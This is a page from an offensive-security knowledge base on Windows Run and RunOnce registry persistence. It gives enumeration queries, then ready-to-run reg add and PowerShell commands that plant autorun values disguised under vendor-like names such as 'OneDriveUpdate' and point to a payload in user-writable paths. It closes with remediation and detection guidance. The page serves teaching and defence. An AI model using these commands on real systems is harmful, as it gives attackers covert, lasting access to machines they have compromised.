Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 03. Persistence / Registry

Run Keys

Run keys are registry locations that Windows checks when a user logs on.

If an attacker can write a value under one of these keys, Windows can launch the configured command during logon. Run values persist across logons. RunOnce values are intended to execute once and then be removed.

HKCU run keys provide current-user persistence. HKLM run keys affect all users and require local administrator rights.

When enumerating Run key persistence opportunities, try to identify:

  • HKCU and HKLM autorun values
  • Values pointing to user-writable paths
  • Payloads staged before registry writes
  • Recently modified autorun keys
  • Suspicious value names mimicking vendors
  • Use of encoded PowerShell, script hosts or LOLBins

Enumeration

Query current-user Run keys:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"

Query machine-wide Run keys:

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"

Check 32-bit view on 64-bit Windows:

reg query "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce"

PowerShell alternatives:

Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue

Use Autoruns when available to review logon autoruns quickly.

Interesting findings include:

  • Unknown value names under Run or RunOnce
  • Values launching from %APPDATA%, %TEMP%, %LOCALAPPDATA%, C:\Users\Public or C:\ProgramData
  • Values executing powershell.exe, wscript.exe, cscript.exe, mshta.exe, rundll32.exe or regsvr32.exe
  • Base64 or long command strings
  • HKLM Run values created near the time of compromise

Once a writable Run key has been identified, persistence can be added by writing a value that points to the payload.


Persistence

HKCU Run Key

HKCU Run persistence executes when the current user logs on.

  1. Place the payload in a stable path
  2. Add a Run value
  3. Log off and back on
  4. Verify payload execution

Add a current-user Run value:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v OneDriveUpdate /t REG_EXPAND_SZ /d "%LOCALAPPDATA%\Microsoft\WindowsApps\updater.exe" /f

PowerShell alternative:

New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDriveUpdate" -PropertyType ExpandString -Value "$env:LOCALAPPDATA\Microsoft\WindowsApps\updater.exe" -Force

Verify:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v OneDriveUpdate

HKLM Run Key

HKLM Run persistence affects all users and requires administrative rights.

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsTelemetry /t REG_EXPAND_SZ /d "C:\ProgramData\Microsoft\Windows\updater.exe" /f

RunOnce

RunOnce is useful for one-time execution after logon, but it should not be treated as durable persistence.

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v UpdateCheck /t REG_EXPAND_SZ /d "%LOCALAPPDATA%\Microsoft\WindowsApps\updater.exe" /f

Remediation

Patch the weakness:

  • Remove unauthorized values from HKCU and HKLM Run and RunOnce keys.
  • Delete payload files referenced by removed autorun values.
  • Remove writable staging locations used by the payload.
  • Restore legitimate autoruns from a known-good baseline if vendor values were modified.
  • Restrict administrative rights required to write HKLM autoruns.

Detect abuse:

  • Monitor Sysmon Event IDs 12 and 13 for Run and RunOnce key changes.
  • Review Security Event ID 4657 where registry auditing is enabled.
  • Alert on autoruns pointing to user-writable paths or script interpreters.
  • Correlate Run key writes with reg.exe, PowerShell New-ItemProperty or Set-ItemProperty.
  • Review logon-time process creation from explorer.exe or userinit.exe that matches new Run key values.